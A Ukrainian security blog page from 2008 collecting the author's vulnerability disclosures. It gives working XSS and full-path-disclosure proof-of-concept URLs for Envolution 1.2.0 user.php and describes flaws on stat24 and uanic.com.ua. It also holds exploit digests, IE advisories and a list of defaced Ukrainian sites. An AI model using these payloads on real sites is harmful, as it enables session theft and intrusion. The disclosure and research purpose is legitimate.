Websecurity - Веб безпека

Нещодавно, 16.08.2008, після попередніх уразливостей в Envolution, я знайшов нові численні уразливості в системі Envolution, зокрема Insufficient Anti-automation та Cross-Site Scripting. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Insuficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

Envolution Insufficient Anti-automation.html

Можна як через POST, так і через GET:

http://site/user.php?uname=test&upass=12345&upassverif=12345&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливості в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

Три дні тому, 15.08.2008, вийшла нова версія WordPress 2.6.1 - оновлення для гілки WP 2.6.x.

WordPress 2.6.1 це багфікс випуск для 2.6 серії. В даній версії були виправлені баги, що були знайдені в WP 2.6. Зокрема покращена підтримка іноземних мов, виправлений баг в gettext, виправлені проблеми з пермалінками на IIS та проблеми зі вставкою зображень в IE, а також збільшена швидкодія адмінки (виправлений баг, що мав місце при великій кількості плагінів).

Всього в версії 2.6.1 виправлено 60 багів.

18.03.2008

У серпні, 24.08.2007, а також додатково сьогодні, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.stat24.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.08.2008

Full path disclosure:

http://www.stat24.com.ua/ua/ranking/frazpc.pl

Дана уразливість вже виправлена (але вона все ще зафіксована в кеші Гугла).

XSS:

Уразливості виявив на доменах http://www.stat24.com.ua і http://www.stat24.ru.

• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені, але виправлені не повністю, тому при невеличкій модифікації одна XSS знову працює (на обох доменах).

XSS:

http://www.stat24.com.ua

• alert(document.cookie)
• цікавий

http://www.stat24.ru

• alert(document.cookie)
• цікавий

Наведені приклади XSS для Mozilla і Firefox. Для IE можуть бути зроблені аналогічні коди.

В даній добірці експлоіти в веб додатках:

• Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability (деталі)
• Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability (деталі)
• OneCMS 2.5 Remote Blind SQL Injection Exploit (деталі)
• PostcardMentor (step1.asp cat_fldAuto) SQL Injection Vulnerability (деталі)
• gameCMS Lite 1.0 (index.php systemId) SQL Injection Vulnerability (деталі)
• Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit (деталі)
• fipsCMS (print.asp lg) Remote SQL Injection Vulnerability (деталі)
• Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability (деталі)
• ezContents CMS 2.0.0 Multiple Remote SQL Injection Vulnerabilities (деталі)
• Exploits PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (деталі)

Сьогодні я знайшов Cross-Site Scripting та Full path disclosure уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

XSS:

Уразливість в user.php (в модулі NS-NewUser) в параметрі op.

http://site/user.php?module=NS-NewUser&op=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/user.php?module=NS-NewUser&op=%3Cscript%3E

або

http://site/user.php?op=%22

Уразлива версія Envolution 1.2.0 та попередні версії.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

П’ятірка похаканих сайтів в Уанеті:

• http://helpanimals.org.ua (хакером BlooDy) - причому спочатку сайт був похаканий 30.07.2008 BlooDy, а потім 16.08.2008 LoCK3R (як це є на даний момент). Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://www.kam-pod.net (хакером 3RqU) - сайт був похаканий 10.08.2008, зараз він вже виправлений адмінами
• http://ukrzem.info (хакерами cRew) - зараз сайт відключений хостером
• http://www.plazan.com.ua (хакером XUGURX)
• http://cityline.sevstar.net (хакером S.H.T.) - взломаний розділ faq сайта

Продовжуючи розпочату традицію, після попереднього відео про SQL Injection в JPortal CMS, пропоную новий відео секюріті мануал. Цього разу відео про Blind SQL Injection (у веб додатку на MySQL). Рекомендую подивитися всім хто цікавиться цією темою.

Demonstration of Blind MySQL Injection (bsqlbf)

В даному відео ролику наочно демонструється проведення Blind SQL Injection атаки за допомогою perl додатка bsqlbf (з отриманням логіна, паролю та інших даних з БД). Рекомендую подивитися дане відео для розуміння векторів атаки за допомогою SQL ін’єкцій та небезпеки подібних уразливостей.

В даній добірці уразливості в веб додатках:

• php-stats xss whois.php (деталі)
• Joomla 1.0.12 CMS - Session fixation Issue in backend Administration interface (деталі)
• FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit (деталі)
• phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit (деталі)
• Best Top List Remote File Upload Vulnerability (деталі)
• 0day Linkliste Version 1.2 Remote File Include by iNs (деталі)
• Security on AIR: Local file access through JavaScript (деталі)
• WebEvents: Online Event Registration Template Username Fields SQL INJECTION (деталі)
• SuskunDuygular - yelik Sistemi v.1 Sql (деталі)
• Впровадження довільних заголовків в TYPO3 (деталі)

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6 та Internet Explorer 7 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server.

Численні ушкодження пам’яті та міжсайтовий скриптінг через MHTML.

• Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass (деталі)
• Microsoft Internet Explorer XHTML Rendering Memory Corruption Vulnerability (деталі)
• Microsoft Internet Explorer Table Layout Memory Corruption Vulnerability (деталі)
• Microsoft Security Bulletin MS08-048 - Important Security Update for Outlook Express and Windows Mail (951066) (деталі)
• Microsoft Security Bulletin MS08-045 - Critical Cumulative Security Update for Internet Explorer (953838) (деталі)

17.03.2008

У серпні, 23.08.2007, я знайшов Cross-Site Scripting уразливість на http://uanic.com.ua (http://hostmaster.net.ua) - сайті компанії Хостмайстер. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.08.2008

XSS:

POST запит на сторінці http://uanic.com.ua/?nicadv (або на сторінці http://hostmaster.net.ua/?nicadv)
"><script>alert(document.cookie)</script>В полі Person.

Дана уразливість вже виправлена.